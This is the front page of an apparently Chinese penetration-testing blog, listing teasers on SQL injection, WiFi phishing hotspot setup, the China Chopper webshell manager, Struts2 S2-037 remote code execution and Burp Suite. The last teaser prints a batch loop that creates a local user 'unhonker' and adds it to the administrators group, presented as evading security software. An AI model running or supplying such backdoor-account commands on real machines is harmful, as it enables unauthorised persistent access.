0nise's Blog ---1931se TeAm!

0nise's Blog ---1931sec TeAm!

0nise's Blog
专注于渗透测试与安全开发
精彩文章

那些年我们一起追逐过的安全工具

阅读(1018)评论(0)

前言 每一段岁月,都会留下属于时代的记忆——那些年,我们所追逐与热衷的安全工具,亦是如此。 在那个信息不对称的年代,安全工具主要是在小圈子内传播。当年天真的我们(脚本小子),以为网络就是江湖,一套完美的工具就是你的兵器——路见不平一声吼,碰到注入亮阿D。 注:由于年代久远,当年的工具大多已停止更新,如今...

精彩文章

浅谈JSP开发的安全问题之SQL注入

阅读(939)评论(0)

作者:0nise 时间:2016年8月11日 14:22:55 社区:i春秋 前言 不管是用什么语言编写WEB应用程序,他们都或多或少有一些地方存在漏洞。如果你想知道漏洞的运行原理,和防御方案,那么请看完本篇文章。 目录 第一节 注入攻击原理及防御 · 1....

时代新闻

这些情趣用品可能被黑客操控了,前几天你是否还在用?

阅读(1192)评论(0)

情人节刚过完,恋爱的酸臭味还没消散,身为单身狗的小编出于好心提醒一下各位要出去HIGH的盆友----情趣用品请慎用,黑客入侵什么的真的有。 01 智能化时代来临,情趣用品紧跟脚步 随着智能化的普及,我们生活中的物品会越来越智能化,市场也催生出各种各样的智能性玩具。使用时,...

精彩文章

浅析B/S架构数据库连接方式

阅读(996)评论(0)

前言 在许许多多的B/S架构系统中都涉及到了数据库的链接,那么对于数据库连接的方式有哪些?可能出现的问题是什么? 目录 1.普通连接方式 2.单例模式 3.连接池 分析 普通连接: 下面是我们一般使用的普通连接方式的代码(jsp) ...

精彩文章

0nise带你玩转wifi钓鱼----钓鱼wifi搭建

阅读(1836)评论(6)

0x00准备 有一句话是这么说的:工欲善其事,必先利其器。这里有几类工具是不可少的,没工具你玩的毛线啊: 1.kali(没kali扯什么?) 2.hostapd(创建无线热点) 3.dnsmasq(dns服务和dhcp服务) 0x01安装 1.安装hostapd apt-get install hostapd 2....

精彩文章

记代码剖析拿到的手机号

阅读(2284)评论(2)

0x00起因 0x01围观 图片一发出 这是怎么回事,补天的大牛竟然不知道这是什么语(j)言(a)写(v)的(a) 于是乎我就放弃了打(L)游(O)戏(L)的时间,来帮忙看手机号,就有了这篇文章 0x02焦点 这段代码的焦点就是在这里 ...

共享资源

【转载】中国菜刀更新

阅读(1689)评论(1)

0X01 简介 中国制造-黑客之刀 大家都知道中国菜刀是我们一些安全人事and黑客经常用的webshell管理工具 昨天我得知菜刀更新了,今天才去下载看的,尼玛,老兵蜀黍233 看看酷炫界面 0x02 下载 官网下载:http://www.maicaidao...

时代新闻

【转载】Struts2 S2-037漏洞检测方法及修复方案附工具

阅读(1224)评论(3)

2016年5月12日,Apache官方发布安全通告S2-033(CVE-2016-3087),在开启动态方法调用(Dynamic Method Invocation)的情况下,攻击者使用REST插件调用恶意表达式可以远程执行代码。 2016年6月9日,Apache官方发布新的安全通告S2-037,与S2-033...

时代新闻

【转载】Struts2 037远程命令执行漏洞初步分析

阅读(1068)评论(0)

在群里有人说struts2又出新漏洞了,当晚乌云就刷了起来,今天过来本地复现了一下,在这里说一下自己的分析结果(如果觉得我说错了还请指出) struts2介绍就不介绍了,个人感觉作为一个框架struts2是非常牛逼的,虽然现在出了很多安全问题 本地复现条件: java JDK 1.7 Tomcat 7.0...

时代新闻

【转载】Struts2 S2-037漏洞预警

阅读(1582)评论(0)

漏洞描述 Apache Struts2在使用REST插件的情况下,攻击者使用REST调用恶意表达式可以远程执行代码。该漏洞编号为CVE-2016-4438,定名S2-037。该漏洞和S2-033漏洞触发流程基本一致,都是在ActionMapping中methodName带入到OGNL表达式中执行,从...

精彩文章

burp suite 使用教程详解(外文翻译转)

阅读(2031)评论(9)

Burp Suite是Web应用程序测试的最佳工具之一,其多种功能可以帮我们执行各种任务.请求的拦截和修改,扫描web应用程序漏洞,以暴力破解登陆表单,执行会话令牌等多种的随机性检查。本文将做一个Burp Suite完全正的演练,主要讨论它的以下特点. 1.代理--Burp Suite带有一个代理,通过默认端口8080上运行,使用这个代理,我们可以截获并...

精彩文章

秒杀一切安全软件 —添加用户

阅读(2041)评论(4)

刚刚看到试了下真加了用户  for /l %%i in (1,1,1000) do @net user unhonker test /add&@net localgroup administrators unhonker /add 保存为bat格局运转,运转过程中安全狗会呈现阻拦提示,不必管它,指令运转完毕后能够...